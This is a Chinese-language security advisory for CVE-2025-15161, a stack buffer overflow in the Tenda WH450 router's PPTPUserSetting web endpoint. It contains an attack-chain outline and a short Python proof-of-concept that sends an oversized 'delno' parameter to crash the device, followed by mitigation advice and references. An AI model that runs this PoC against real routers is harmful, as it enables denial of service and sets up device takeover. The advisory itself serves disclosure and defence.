CVE-2025-15161 Tenda WH450路由器栈缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-15161

漏洞类型

缓冲区溢出

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Tenda WH450

漏洞概述

CVE-2025-15161是影响Tenda WH450路由器1.0.0.18版本的栈缓冲区溢出漏洞。该漏洞存在于路由器的Web管理界面中的/goform/PPTPUserSetting端点，攻击者可以通过构造恶意的delno参数值来触发栈缓冲区溢出。由于该漏洞可通过网络远程利用，且无需用户交互即可实施攻击，因此具有较高的安全风险。攻击者成功利用此漏洞可能导致设备拒绝服务、执行任意代码或获得设备的完全控制权。此漏洞已被公开披露，PoC代码已在互联网上流传，建议受影响用户尽快采取防护措施。

技术细节

漏洞位于Tenda WH450路由器的/goform/PPTPUserSetting处理程序中。当处理HTTP请求时，程序未对用户输入的delno参数进行适当的边界检查，直接将其复制到栈上的固定大小缓冲区中。攻击者可以通过发送超长的delno参数值（如包含数百个字符的字符串）来溢出该缓冲区，覆盖相邻的栈内存区域，包括返回地址和函数指针等关键数据。由于路由器固件以较高权限运行，攻击者可以利用溢出的数据劫持程序执行流程，最终实现远程代码执行。漏洞的利用需要认证到路由器管理界面（高权限要求），但攻击者可以通过默认凭证或会话劫持等方式获取访问权限。

攻击链分析

STEP 1

步骤1

攻击者扫描互联网或本地网络中的Tenda WH450路由器设备

STEP 2

步骤2

攻击者通过默认凭证或漏洞获取路由器管理界面访问权限

STEP 3

步骤3

攻击者构造包含超长字符串的delno参数，发送POST请求到/goform/PPTPUserSetting端点

STEP 4

步骤4

恶意数据溢出栈缓冲区，覆盖返回地址和关键寄存器

STEP 5

步骤5

攻击者通过ROP链或shellcode实现代码执行，获得路由器root权限

STEP 6

步骤6

攻击者可部署后门、窃取网络流量或将其纳入僵尸网络

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-15161 PoC - Tenda WH450 /goform/PPTPUserSetting Buffer Overflow
# Target: Tenda WH450 Firmware 1.0.0.18

import requests
import sys

def exploit(target_ip, target_port=80):
    """Exploit stack-based buffer overflow in PPTPUserSetting"""
    
    url = f"http://{target_ip}:{target_port}/goform/PPTPUserSetting"
    
    # Generate payload with oversized delno parameter
    # Overflow the stack buffer to overwrite return address
    padding = b"A" * 500
    
    # Craft malicious delno parameter
    payload = {
        "delno": padding.decode('utf-8'),
        "other_params": "value"
    }
    
    try:
        print(f"[*] Sending exploit payload to {url}")
        response = requests.post(url, data=payload, timeout=10)
        print(f"[*] Response status: {response.status_code}")
        print(f"[*] Buffer overflow triggered - check device stability")
        return True
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    exploit(target, port)

影响范围

Tenda WH450 1.0.0.18

防御指南

临时缓解措施

立即关闭路由器的远程Web管理功能，仅允许通过本地网络访问管理界面。如必须远程管理，应使用VPN隧道连接。同时建议监控设备运行状态，若发现设备异常重启或性能下降，应及时检查是否已被攻击。建议用户联系Tenda官方技术支持，确认是否有针对此漏洞的固件补丁可供更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15161
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15161
3 Details https://www.cvedetails.com/cve/CVE-2025-15161/
4 VulDB https://vuldb.com/cve/CVE-2025-15161
5 Link https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/PPTPUserSetting/PPTPUserSetting.md
6 Link https://vuldb.com/?ctiid.338536
7 Link https://vuldb.com/?id.338536
8 Link https://vuldb.com/?submit.720887
9 Link https://www.tenda.com.cn/